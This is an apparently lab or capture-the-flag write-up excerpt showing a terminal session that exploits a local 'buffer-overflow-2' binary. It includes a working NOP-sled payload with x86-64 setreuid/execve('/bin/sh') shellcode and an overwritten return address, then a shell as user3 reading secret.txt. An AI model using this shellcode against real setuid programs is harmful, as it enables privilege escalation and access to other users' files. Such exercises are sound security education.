[user1@ip-10-10-64-110 overflow-4]$ ./buffer-overflow-2 $(python -c "print('\x90' * 90 + '\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 19 + '\x8c\xe2\xff\xff\xff\x7f')")
new word is doggo������������������������������������������������������������������������������������������1�f��jqXH��j;XH1�I�//bin/shI�APH��RWH��j<XH1�AAAAAAAAAAAAAAAAAAA�����
sh-4.2$ id
uid=1003(user3) gid=1001(user1) groups=1001(user1)
sh-4.2$ cat secret.txt 
wowanothertime!!

You can note that the setreuid shell code have a little bit changed because the owner of secret.txt is user3 so the uid is 1003.